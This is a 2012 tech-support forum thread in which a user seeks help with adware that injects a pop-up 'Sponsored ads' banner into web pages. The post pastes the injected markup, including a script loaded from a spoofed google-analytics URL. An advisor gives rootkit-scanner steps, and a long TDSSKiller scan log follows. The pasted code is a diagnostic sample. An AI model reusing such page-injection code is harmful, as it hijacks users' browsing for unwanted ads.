Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Google Analytics banner pop up?


  • Please log in to reply
17 replies to this topic

#1 mattsbach

mattsbach

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 13 April 2012 - 12:08 PM

HI - I am getting a little sliding window pop up on the bottom left of my browser (firefox). I am running Windows 7 Pro. I looked at the source code of the banner - it is:

The script that appears to be generating the banner:
<script src="http://www.google-analytics.com/gs.js?1&amp;code=4f8856e670224&amp;title=&amp;keywords=&amp;keywords_text=string%2Cpiano%2Csolo%2Corchestra%2Cquartet%2Cla&amp;ref=http%3A%2F%2Fwww.dominikmaican.com%2Fworks.php&amp;u=0&amp;pref=http%3A%2F%2Fwww.dominikmaican.com%2F&amp;utmcc=__utma%3D%2B__utmz%3D" async=""></script><div><div id="0.8031048317639154" style="cursor: pointer; position: fixed; right: 0pt; width: 200px; border: 2px solid black; background-color: white; text-align: center; padding: 5px; bottom: 4px;"><div onclick="kdfjunfldi_minimizeBanner();" style="background: url(&quot;http://www.google-analytics.com/img/close-btn.png&quot;) no-repeat scroll 1px 1px transparent; position: absolute; top: -17px; right: 0pt; height: 13px; width: 13px; margin: 0pt; padding: 0pt;"></div><div onclick="kdfjunfldi_goByBanner();" style="margin: 0pt; padding: 0pt;"><h5 style="font-size: 10px; font-weight: normal; margin: -5px 0pt; padding-bottom: 5px; text-align: right;">Sponsored ads</h5><h1 style="font-size: 24px; border-bottom: 2px dotted blue;"><a style="font-size: 24px; color: black; text-decoration: underline; line-height: 1;" onclick="return false;" class="addeyaw" href="#">Solo Piano by Jeff Bjorck</a></h1><br><p style="font-size: 16px;">Preview Bjorck's stunning solo piano CDs, MP3s, and sheet music.</p></div></div></div><div><div onclick="kdfjunfldi_maximizeBanner();" id="0.01357293031746365" style="z-index: 9999; display: none; cursor: pointer; position: fixed ! important; right: 0pt; bottom: 0pt; font-size: 16px; width: 200px; height: 20px; border: 2px solid black; text-align: center; padding: 5px; margin: 0pt; background-color: white; color: black; overflow: hidden;">Recommended for You</div></div>

The code of the actual generated banner:
<div onclick="kdfjunfldi_goByBanner();" style="margin: 0pt; padding: 0pt;"><h5 style="font-size: 10px; font-weight: normal; margin: -5px 0pt; padding-bottom: 5px; text-align: right;">Sponsored ads</h5><h1 style="font-size: 24px; border-bottom: 2px dotted blue;"><a style="font-size: 24px; color: black; text-decoration: underline; line-height: 1;" onclick="return false;" class="addeyaw" href="#">Solo Piano by Jeff Bjorck</a></h1><br><p style="font-size: 16px;">Preview Bjorck's stunning solo piano CDs, MP3s, and sheet music.</p></div>

It appears to be spyware - the php files themselves are not affect - not that I can see. The pop up appears randomly on different sites. Can you help me diagnose and remove? I have SpywareHunter (registered account) and Malware Bytes (free version)

Thanks for your help!
matthew

Edit: Moved topic from Windows 7 to the more appropriate forum. ~ Animal

BC AdBot (Login to Remove)

 


#2 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 13 April 2012 - 10:46 PM

Download

TDSSkiller

Launch it.Click on change parameters-Select TDLFS file system

Click on "Scan".Please post the LOG report(log file should be in your C drive)


Please download GMER from here(doesnot work on 64 bit OS)

http://www2.gmer.net/download.php

Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.

GMER will open to the Rootkit/Malware tab and perform an automatic Full Scan when first run. (do not use the computer while the scan is in progress)

If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
Now click the Scan button. If you see a rootkit warning window, click OK.
When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
Click the Copy button and paste the results into your next reply.


Download

aswMBR

Launch it, allow it to download latest Avast! virus definitions
Click the "Scan" button to start scan.After scan finishes,click on Save log

Post the log results here

#3 kevincol

kevincol

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:09:56 AM

Posted 15 April 2012 - 10:30 PM

Hi,

I have the exact same problem as described in the original post. I am running 64bit Windows, so what rootkit remover could I run as GMER is 32bit only?

#4 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 15 April 2012 - 11:24 PM

@kevin

create a new topic to avoid confusions

thanks

#5 mattsbach

mattsbach
  • Topic Starter

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 16 April 2012 - 01:41 PM

thank you:

14:29:49.0632 7520 TDSS rootkit removing tool 2.7.28.0 Apr 10 2012 16:54:05
14:29:49.0832 7520 ============================================================
14:29:49.0832 7520 Current date / time: 2012/04/16 14:29:49.0832
14:29:49.0832 7520 SystemInfo:
14:29:49.0832 7520
14:29:49.0832 7520 OS Version: 6.1.7601 ServicePack: 1.0
14:29:49.0832 7520 Product type: Workstation
14:29:49.0832 7520 ComputerName: OWNER-PC110658
14:29:49.0832 7520 UserName: Owner
14:29:49.0832 7520 Windows directory: C:\Windows
14:29:49.0832 7520 System windows directory: C:\Windows
14:29:49.0832 7520 Running under WOW64
14:29:49.0832 7520 Processor architecture: Intel x64
14:29:49.0832 7520 Number of processors: 8
14:29:49.0832 7520 Page size: 0x1000
14:29:49.0832 7520 Boot type: Normal boot
14:29:49.0832 7520 ============================================================
14:29:50.0191 7520 Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
14:29:50.0192 7520 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
14:29:50.0195 7520 Drive \Device\Harddisk2\DR2 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0196 7520 Drive \Device\Harddisk3\DR3 - Size: 0x7446E00000 (465.11 Gb), SectorSize: 0x200, Cylinders: 0xED2B, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0495 7520 Drive \Device\Harddisk4\DR4 - Size: 0x7470C05E00 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0507 7520 \Device\Harddisk0\DR0:
14:29:50.0519 7520 MBR used
14:29:50.0519 7520 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x38949991
14:29:50.0519 7520 \Device\Harddisk1\DR1:
14:29:50.0519 7520 MBR used
14:29:50.0519 7520 \Device\Harddisk1\DR1\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
14:29:50.0519 7520 \Device\Harddisk2\DR2:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk2\DR2\Partition0: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x74705982
14:29:50.0520 7520 \Device\Harddisk3\DR3:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk3\DR3\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x3A236800
14:29:50.0520 7520 \Device\Harddisk4\DR4:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk4\DR4\Partition0: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x3A384C02
14:29:50.0680 7520 Initialize success
14:29:50.0680 7520 ============================================================
14:29:52.0371 1144 ============================================================
14:29:52.0371 1144 Scan started
14:29:52.0371 1144 Mode: Manual;
14:29:52.0371 1144 ============================================================
14:29:53.0327 1144 1394ohci (a87d604aea360176311474c87a63bb88) C:\Windows\system32\DRIVERS\1394ohci.sys
14:29:53.0328 1144 1394ohci - ok
14:29:53.0349 1144 ACPI (d81d9e70b8a6dd14d42d7b4efa65d5f2) C:\Windows\system32\drivers\ACPI.sys
14:29:53.0350 1144 ACPI - ok
14:29:53.0364 1144 AcpiPmi (99f8e788246d495ce3794d7e7821d2ca) C:\Windows\system32\drivers\acpipmi.sys
14:29:53.0364 1144 AcpiPmi - ok
14:29:53.0448 1144 AdobeARMservice (62b7936f9036dd6ed36e6a7efa805dc0) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
14:29:53.0448 1144 AdobeARMservice - ok
14:29:53.0514 1144 adp94xx (2f6b34b83843f0c5118b63ac634f5bf4) C:\Windows\system32\drivers\adp94xx.sys
14:29:53.0516 1144 adp94xx - ok
14:29:53.0529 1144 adpahci (597f78224ee9224ea1a13d6350ced962) C:\Windows\system32\drivers\adpahci.sys
14:29:53.0531 1144 adpahci - ok
14:29:53.0547 1144 adpu320 (e109549c90f62fb570b9540c4b148e54) C:\Windows\system32\drivers\adpu320.sys
14:29:53.0548 1144 adpu320 - ok
14:29:53.0562 1144 AeLookupSvc (4b78b431f225fd8624c5655cb1de7b61) C:\Windows\System32\aelupsvc.dll
14:29:53.0562 1144 AeLookupSvc - ok
14:29:53.0591 1144 AFD (d5b031c308a409a0a576bff4cf083d30) C:\Windows\system32\drivers\afd.sys
14:29:53.0593 1144 AFD - ok
14:29:53.0613 1144 agp440 (608c14dba7299d8cb6ed035a68a15799) C:\Windows\system32\drivers\agp440.sys
14:29:53.0613 1144 agp440 - ok
14:29:53.0634 1144 ALG (3290d6946b5e30e70414990574883ddb) C:\Windows\System32\alg.exe
14:29:53.0635 1144 ALG - ok
14:29:53.0665 1144 aliide (5812713a477a3ad7363c7438ca2ee038) C:\Windows\system32\drivers\aliide.sys
14:29:53.0665 1144 aliide - ok
14:29:53.0671 1144 amdide (1ff8b4431c353ce385c875f194924c0c) C:\Windows\system32\drivers\amdide.sys
14:29:53.0671 1144 amdide - ok
14:29:53.0683 1144 AmdK8 (7024f087cff1833a806193ef9d22cda9) C:\Windows\system32\drivers\amdk8.sys
14:29:53.0683 1144 AmdK8 - ok
14:29:53.0693 1144 AmdPPM (1e56388b3fe0d031c44144eb8c4d6217) C:\Windows\system32\drivers\amdppm.sys
14:29:53.0694 1144 AmdPPM - ok
14:29:53.0723 1144 amdsata (d4121ae6d0c0e7e13aa221aa57ef2d49) C:\Windows\system32\drivers\amdsata.sys
14:29:53.0724 1144 amdsata - ok
14:29:53.0751 1144 amdsbs (f67f933e79241ed32ff46a4f29b5120b) C:\Windows\system32\drivers\amdsbs.sys
14:29:53.0752 1144 amdsbs - ok
14:29:53.0784 1144 amdxata (540daf1cea6094886d72126fd7c33048) C:\Windows\system32\drivers\amdxata.sys
14:29:53.0784 1144 amdxata - ok
14:29:53.0812 1144 AppID (89a69c3f2f319b43379399547526d952) C:\Windows\system32\drivers\appid.sys
14:29:53.0812 1144 AppID - ok
14:29:53.0834 1144 AppIDSvc (0bc381a15355a3982216f7172f545de1) C:\Windows\System32\appidsvc.dll
14:29:53.0834 1144 AppIDSvc - ok
14:29:53.0843 1144 Appinfo (3977d4a871ca0d4f2ed1e7db46829731) C:\Windows\System32\appinfo.dll
14:29:53.0843 1144 Appinfo - ok
14:29:53.0944 1144 Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
14:29:53.0945 1144 Apple Mobile Device - ok
14:29:53.0993 1144 AppMgmt (4aba3e75a76195a3e38ed2766c962899) C:\Windows\System32\appmgmts.dll
14:29:53.0993 1144 AppMgmt - ok
14:29:54.0027 1144 arc (c484f8ceb1717c540242531db7845c4e) C:\Windows\system32\drivers\arc.sys
14:29:54.0028 1144 arc - ok
14:29:54.0034 1144 arcsas (019af6924aefe7839f61c830227fe79c) C:\Windows\system32\drivers\arcsas.sys
14:29:54.0034 1144 arcsas - ok
14:29:54.0056 1144 AsyncMac (769765ce2cc62867468cea93969b2242) C:\Windows\system32\DRIVERS\asyncmac.sys
14:29:54.0056 1144 AsyncMac - ok
14:29:54.0077 1144 atapi (02062c0b390b7729edc9e69c680a6f3c) C:\Windows\system32\drivers\atapi.sys
14:29:54.0077 1144 atapi - ok
14:29:54.0110 1144 AudioEndpointBuilder (f23fef6d569fce88671949894a8becf1) C:\Windows\System32\Audiosrv.dll
14:29:54.0113 1144 AudioEndpointBuilder - ok
14:29:54.0118 1144 AudioSrv (f23fef6d569fce88671949894a8becf1) C:\Windows\System32\Audiosrv.dll
14:29:54.0120 1144 AudioSrv - ok
14:29:54.0161 1144 AxInstSV (a6bf31a71b409dfa8cac83159e1e2aff) C:\Windows\System32\AxInstSV.dll
14:29:54.0161 1144 AxInstSV - ok
14:29:54.0190 1144 b06bdrv (3e5b191307609f7514148c6832bb0842) C:\Windows\system32\drivers\bxvbda.sys
14:29:54.0191 1144 b06bdrv - ok
14:29:54.0230 1144 b57nd60a (b5ace6968304a3900eeb1ebfd9622df2) C:\Windows\system32\DRIVERS\b57nd60a.sys
14:29:54.0231 1144 b57nd60a - ok
14:29:54.0260 1144 BDESVC (fde360167101b4e45a96f939f388aeb0) C:\Windows\System32\bdesvc.dll
14:29:54.0261 1144 BDESVC - ok
14:29:54.0273 1144 Beep (16a47ce2decc9b099349a5f840654746) C:\Windows\system32\drivers\Beep.sys
14:29:54.0273 1144 Beep - ok
14:29:54.0317 1144 BFE (82974d6a2fd19445cc5171fc378668a4) C:\Windows\System32\bfe.dll
14:29:54.0320 1144 BFE - ok
14:29:54.0347 1144 BITS (1ea7969e3271cbc59e1730697dc74682) C:\Windows\System32\qmgr.dll
14:29:54.0350 1144 BITS - ok
14:29:54.0388 1144 blbdrive (61583ee3c3a17003c4acd0475646b4d3) C:\Windows\system32\DRIVERS\blbdrive.sys
14:29:54.0389 1144 blbdrive - ok
14:29:54.0484 1144 Bluetooth Device Manager (e7062088161c56bf42e7dba53664e584) C:\Program Files\Motorola\Bluetooth\devmgrsrv.exe
14:29:54.0497 1144 Bluetooth Device Manager - ok
14:29:54.0521 1144 Bluetooth Media Service (21b1cb06c0254bbc08b8c30d8f282e69) C:\Program Files\Motorola\Bluetooth\audiosrv.exe
14:29:54.0525 1144 Bluetooth Media Service - ok
14:29:54.0532 1144 Bluetooth OBEX Service (0bc0dc720f22a9d6d721fd5b7d15e84f) C:\Program Files\Motorola\Bluetooth\obexsrv.exe
14:29:54.0535 1144 Bluetooth OBEX Service - ok
14:29:54.0616 1144 Bonjour Service (ebbcd5dfbb1de70e8f4af8fa59e401fd) C:\Program Files\Bonjour\mDNSResponder.exe
14:29:54.0618 1144 Bonjour Service - ok
14:29:54.0688 1144 bowser (6c02a83164f5cc0a262f4199f0871cf5) C:\Windows\system32\DRIVERS\bowser.sys
14:29:54.0689 1144 bowser - ok
14:29:54.0715 1144 BrFiltLo (f09eee9edc320b5e1501f749fde686c8) C:\Windows\system32\drivers\BrFiltLo.sys
14:29:54.0715 1144 BrFiltLo - ok
14:29:54.0721 1144 BrFiltUp (b114d3098e9bdb8bea8b053685831be6) C:\Windows\system32\drivers\BrFiltUp.sys
14:29:54.0721 1144 BrFiltUp - ok
14:29:54.0754 1144 Browser (8ef0d5c41ec907751b8429162b1239ed) C:\Windows\System32\browser.dll
14:29:54.0754 1144 Browser - ok
14:29:54.0762 1144 Brserid (43bea8d483bf1870f018e2d02e06a5bd) C:\Windows\System32\Drivers\Brserid.sys
14:29:54.0763 1144 Brserid - ok
14:29:54.0768 1144 BrSerWdm (a6eca2151b08a09caceca35c07f05b42) C:\Windows\System32\Drivers\BrSerWdm.sys
14:29:54.0768 1144 BrSerWdm - ok
14:29:54.0773 1144 BrUsbMdm (b79968002c277e869cf38bd22cd61524) C:\Windows\System32\Drivers\BrUsbMdm.sys
14:29:54.0773 1144 BrUsbMdm - ok
14:29:54.0778 1144 BrUsbSer (a87528880231c54e75ea7a44943b38bf) C:\Windows\System32\Drivers\BrUsbSer.sys
14:29:54.0778 1144 BrUsbSer - ok
14:29:54.0797 1144 BTHMODEM (9da669f11d1f894ab4eb69bf546a42e8) C:\Windows\system32\drivers\bthmodem.sys
14:29:54.0798 1144 BTHMODEM - ok
14:29:54.0833 1144 bthserv (95f9c2976059462cbbf227f7aab10de9) C:\Windows\system32\bthserv.dll
14:29:54.0834 1144 bthserv - ok
14:29:54.0888 1144 BTMCOM (6d3ff2b480f7ab8da103cbc7fbeacd48) C:\Windows\system32\Drivers\btmcom.sys
14:29:54.0889 1144 BTMCOM - ok
14:29:54.0935 1144 BTMUSB (8515aa7dc5ecebdfcc480d2001398bd7) C:\Windows\system32\Drivers\btmusb.sys
14:29:54.0937 1144 BTMUSB - ok
14:29:54.0978 1144 cbfs3 (b9f9b339e3996a28a37b55b1c74e1d66) C:\Windows\system32\drivers\cbfs3.sys
14:29:54.0979 1144 cbfs3 - ok
14:29:55.0011 1144 cdfs (b8bd2bb284668c84865658c77574381a) C:\Windows\system32\DRIVERS\cdfs.sys
14:29:55.0011 1144 cdfs - ok
14:29:55.0031 1144 cdrom (f036ce71586e93d94dab220d7bdf4416) C:\Windows\system32\DRIVERS\cdrom.sys
14:29:55.0031 1144 cdrom - ok
14:29:55.0091 1144 CertPropSvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
14:29:55.0091 1144 CertPropSvc - ok
14:29:55.0134 1144 circlass (d7cd5c4e1b71fa62050515314cfb52cf) C:\Windows\system32\drivers\circlass.sys
14:29:55.0134 1144 circlass - ok
14:29:55.0157 1144 CLFS (fe1ec06f2253f691fe36217c592a0206) C:\Windows\system32\CLFS.sys
14:29:55.0159 1144 CLFS - ok
14:29:55.0200 1144 clr_optimization_v2.0.50727_32 (d88040f816fda31c3b466f0fa0918f29) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
14:29:55.0200 1144 clr_optimization_v2.0.50727_32 - ok
14:29:55.0239 1144 clr_optimization_v2.0.50727_64 (d1ceea2b47cb998321c579651ce3e4f8) C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
14:29:55.0239 1144 clr_optimization_v2.0.50727_64 - ok
14:29:55.0282 1144 clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
14:29:55.0283 1144 clr_optimization_v4.0.30319_32 - ok
14:29:55.0300 1144 clr_optimization_v4.0.30319_64 (c6f9af94dcd58122a4d7e89db6bed29d) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
14:29:55.0300 1144 clr_optimization_v4.0.30319_64 - ok
14:29:55.0352 1144 CmBatt (0840155d0bddf1190f84a663c284bd33) C:\Windows\system32\drivers\CmBatt.sys
14:29:55.0352 1144 CmBatt - ok
14:29:55.0370 1144 cmdide (e19d3f095812725d88f9001985b94edd) C:\Windows\system32\drivers\cmdide.sys
14:29:55.0370 1144 cmdide - ok
14:29:55.0398 1144 CNG (d5fea92400f12412b3922087c09da6a5) C:\Windows\system32\Drivers\cng.sys
14:29:55.0399 1144 CNG - ok
14:29:55.0415 1144 Compbatt (102de219c3f61415f964c88e9085ad14) C:\Windows\system32\drivers\compbatt.sys
14:29:55.0415 1144 Compbatt - ok
14:29:55.0434 1144 CompositeBus (03edb043586cceba243d689bdda370a8) C:\Windows\system32\DRIVERS\CompositeBus.sys
14:29:55.0434 1144 CompositeBus - ok
14:29:55.0446 1144 COMSysApp - ok
14:29:55.0461 1144 crcdisk (1c827878a998c18847245fe1f34ee597) C:\Windows\system32\drivers\crcdisk.sys
14:29:55.0461 1144 crcdisk - ok
14:29:55.0480 1144 CryptSvc (15597883fbe9b056f276ada3ad87d9af) C:\Windows\system32\cryptsvc.dll
14:29:55.0481 1144 CryptSvc - ok
14:29:55.0513 1144 CSC (54da3dfd29ed9f1619b6f53f3ce55e49) C:\Windows\system32\drivers\csc.sys
14:29:55.0515 1144 CSC - ok
14:29:55.0537 1144 CscService (3ab183ab4d2c79dcf459cd2c1266b043) C:\Windows\System32\cscsvc.dll
14:29:55.0539 1144 CscService - ok
14:29:55.0554 1144 DcomLaunch (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
14:29:55.0556 1144 DcomLaunch - ok
14:29:55.0578 1144 defragsvc (3cec7631a84943677aa8fa8ee5b6b43d) C:\Windows\System32\defragsvc.dll
14:29:55.0579 1144 defragsvc - ok
14:29:55.0598 1144 DfsC (9bb2ef44eaa163b29c4a4587887a0fe4) C:\Windows\system32\Drivers\dfsc.sys
14:29:55.0599 1144 DfsC - ok
14:29:55.0632 1144 Dhcp (43d808f5d9e1a18e5eeb5ebc83969e4e) C:\Windows\system32\dhcpcore.dll
14:29:55.0633 1144 Dhcp - ok
14:29:55.0649 1144 discache (13096b05847ec78f0977f2c0f79e9ab3) C:\Windows\system32\drivers\discache.sys
14:29:55.0649 1144 discache - ok
14:29:55.0671 1144 Disk (9819eee8b5ea3784ec4af3b137a5244c) C:\Windows\system32\drivers\disk.sys
14:29:55.0672 1144 Disk - ok
14:29:55.0701 1144 dmvsc (5db085a8a6600be6401f2b24eecb5415) C:\Windows\system32\drivers\dmvsc.sys
14:29:55.0702 1144 dmvsc - ok
14:29:55.0727 1144 Dnscache (16835866aaa693c7d7fceba8fff706e4) C:\Windows\System32\dnsrslvr.dll
14:29:55.0727 1144 Dnscache - ok
14:29:55.0742 1144 dot3svc (b1fb3ddca0fdf408750d5843591afbc6) C:\Windows\System32\dot3svc.dll
14:29:55.0743 1144 dot3svc - ok
14:29:55.0754 1144 DPS (b26f4f737e8f9df4f31af6cf31d05820) C:\Windows\system32\dps.dll
14:29:55.0755 1144 DPS - ok
14:29:55.0783 1144 drmkaud (9b19f34400d24df84c858a421c205754) C:\Windows\system32\drivers\drmkaud.sys
14:29:55.0784 1144 drmkaud - ok
14:29:55.0814 1144 DXGKrnl (f5bee30450e18e6b83a5012c100616fd) C:\Windows\System32\drivers\dxgkrnl.sys
14:29:55.0818 1144 DXGKrnl - ok
14:29:55.0844 1144 e1cexpress (471612d324d8682b98b267bd091d2219) C:\Windows\system32\DRIVERS\e1c62x64.sys
14:29:55.0845 1144 e1cexpress - ok
14:29:55.0869 1144 EapHost (e2dda8726da9cb5b2c4000c9018a9633) C:\Windows\System32\eapsvc.dll
14:29:55.0869 1144 EapHost - ok
14:29:55.0915 1144 ebdrv (dc5d737f51be844d8c82c695eb17372f) C:\Windows\system32\drivers\evbda.sys
14:29:55.0926 1144 ebdrv - ok
14:29:55.0952 1144 EFS (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\System32\lsass.exe
14:29:55.0952 1144 EFS - ok
14:29:55.0990 1144 ehRecvr (c4002b6b41975f057d98c439030cea07) C:\Windows\ehome\ehRecvr.exe
14:29:55.0992 1144 ehRecvr - ok
14:29:56.0000 1144 ehSched (4705e8ef9934482c5bb488ce28afc681) C:\Windows\ehome\ehsched.exe
14:29:56.0000 1144 ehSched - ok
14:29:56.0051 1144 ElbyCDIO (a05fc7eca0966ebb70e4d17b855a853b) C:\Windows\system32\Drivers\ElbyCDIO.sys
14:29:56.0051 1144 ElbyCDIO - ok
14:29:56.0087 1144 elxstor (0e5da5369a0fcaea12456dd852545184) C:\Windows\system32\drivers\elxstor.sys
14:29:56.0088 1144 elxstor - ok
14:29:56.0099 1144 ErrDev (34a3c54752046e79a126e15c51db409b) C:\Windows\system32\drivers\errdev.sys
14:29:56.0099 1144 ErrDev - ok
14:29:56.0231 1144 esgiguard (df96c3cd6ae15f6d0a6bcb70f9c1e88d) C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys
14:29:56.0231 1144 esgiguard - ok
14:29:56.0433 1144 EventSystem (4166f82be4d24938977dd1746be9b8a0) C:\Windows\system32\es.dll
14:29:56.0435 1144 EventSystem - ok
14:29:56.0499 1144 exfat (a510c654ec00c1e9bdd91eeb3a59823b) C:\Windows\system32\drivers\exfat.sys
14:29:56.0500 1144 exfat - ok
14:29:56.0512 1144 fastfat (0adc83218b66a6db380c330836f3e36d) C:\Windows\system32\drivers\fastfat.sys
14:29:56.0513 1144 fastfat - ok
14:29:56.0582 1144 Fax (dbefd454f8318a0ef691fdd2eaab44eb) C:\Windows\system32\fxssvc.exe
14:29:56.0585 1144 Fax - ok
14:29:56.0640 1144 fdc (d765d19cd8ef61f650c384f62fac00ab) C:\Windows\system32\drivers\fdc.sys
14:29:56.0641 1144 fdc - ok
14:29:56.0653 1144 fdPHost (0438cab2e03f4fb61455a7956026fe86) C:\Windows\system32\fdPHost.dll
14:29:56.0653 1144 fdPHost - ok
14:29:56.0664 1144 FDResPub (802496cb59a30349f9a6dd22d6947644) C:\Windows\system32\fdrespub.dll
14:29:56.0664 1144 FDResPub - ok
14:29:56.0679 1144 FileInfo (655661be46b5f5f3fd454e2c3095b930) C:\Windows\system32\drivers\fileinfo.sys
14:29:56.0680 1144 FileInfo - ok
14:29:56.0692 1144 Filetrace (5f671ab5bc87eea04ec38a6cd5962a47) C:\Windows\system32\drivers\filetrace.sys
14:29:56.0693 1144 Filetrace - ok
14:29:56.0732 1144 FLEXnet Licensing Service (3d9b36631032fde0ffea0dc0260e4e35) C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
14:29:56.0734 1144 FLEXnet Licensing Service - ok
14:29:56.0758 1144 FLEXnet Licensing Service 64 (52c0312ab35eb7187015fb6a99136bb5) C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
14:29:56.0762 1144 FLEXnet Licensing Service 64 - ok
14:29:56.0820 1144 flpydisk (c172a0f53008eaeb8ea33fe10e177af5) C:\Windows\system32\drivers\flpydisk.sys
14:29:56.0821 1144 flpydisk - ok
14:29:56.0839 1144 FltMgr (da6b67270fd9db3697b20fce94950741) C:\Windows\system32\drivers\fltmgr.sys
14:29:56.0840 1144 FltMgr - ok
14:29:56.0869 1144 FontCache (5c4cb4086fb83115b153e47add961a0c) C:\Windows\system32\FntCache.dll
14:29:56.0872 1144 FontCache - ok
14:29:56.0920 1144 FontCache3.0.0.0 (a8b7f3818ab65695e3a0bb3279f6dce6) C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
14:29:56.0920 1144 FontCache3.0.0.0 - ok
14:29:56.0975 1144 FsDepends (d43703496149971890703b4b1b723eac) C:\Windows\system32\drivers\FsDepends.sys
14:29:56.0975 1144 FsDepends - ok
14:29:56.0996 1144 Fs_Rec (e95ef8547de20cf0603557c0cf7a9462) C:\Windows\system32\drivers\Fs_Rec.sys
14:29:56.0997 1144 Fs_Rec - ok
14:29:57.0016 1144 fvevol (1f7b25b858fa27015169fe95e54108ed) C:\Windows\system32\DRIVERS\fvevol.sys
14:29:57.0017 1144 fvevol - ok
14:29:57.0032 1144 gagp30kx (8c778d335c9d272cfd3298ab02abe3b6) C:\Windows\system32\drivers\gagp30kx.sys
14:29:57.0033 1144 gagp30kx - ok
14:29:57.0073 1144 GEARAspiWDM (e403aacf8c7bb11375122d2464560311) C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
14:29:57.0073 1144 GEARAspiWDM - ok
14:29:57.0104 1144 gpsvc (277bbc7e1aa1ee957f573a10eca7ef3a) C:\Windows\System32\gpsvc.dll
14:29:57.0107 1144 gpsvc - ok
14:29:57.0159 1144 gupdate (f02a533f517eb38333cb12a9e8963773) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
14:29:57.0160 1144 gupdate - ok
14:29:57.0162 1144 gupdatem (f02a533f517eb38333cb12a9e8963773) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
14:29:57.0163 1144 gupdatem - ok
14:29:57.0233 1144 hcw85cir (f2523ef6460fc42405b12248338ab2f0) C:\Windows\system32\drivers\hcw85cir.sys
14:29:57.0233 1144 hcw85cir - ok
14:29:57.0268 1144 HdAudAddService (975761c778e33cd22498059b91e7373a) C:\Windows\system32\drivers\HdAudio.sys
14:29:57.0269 1144 HdAudAddService - ok
14:29:57.0294 1144 HDAudBus (97bfed39b6b79eb12cddbfeed51f56bb) C:\Windows\system32\DRIVERS\HDAudBus.sys
14:29:57.0294 1144 HDAudBus - ok
14:29:57.0347 1144 hdsp (981135f473d20c32f6bdf5952a08be14) C:\Windows\system32\drivers\hdsp_64.sys
14:29:57.0347 1144 hdsp - ok
14:29:57.0361 1144 HidBatt (78e86380454a7b10a5eb255dc44a355f) C:\Windows\system32\drivers\HidBatt.sys
14:29:57.0361 1144 HidBatt - ok
14:29:57.0392 1144 HidBth (7fd2a313f7afe5c4dab14798c48dd104) C:\Windows\system32\drivers\hidbth.sys
14:29:57.0393 1144 HidBth - ok
14:29:57.0398 1144 HidIr (0a77d29f311b88cfae3b13f9c1a73825) C:\Windows\system32\drivers\hidir.sys
14:29:57.0398 1144 HidIr - ok
14:29:57.0416 1144 hidserv (bd9eb3958f213f96b97b1d897dee006d) C:\Windows\system32\hidserv.dll
14:29:57.0417 1144 hidserv - ok
14:29:57.0446 1144 HidUsb (9592090a7e2b61cd582b612b6df70536) C:\Windows\system32\DRIVERS\hidusb.sys
14:29:57.0447 1144 HidUsb - ok
14:29:57.0473 1144 hkmsvc (387e72e739e15e3d37907a86d9ff98e2) C:\Windows\system32\kmsvc.dll
14:29:57.0473 1144 hkmsvc - ok
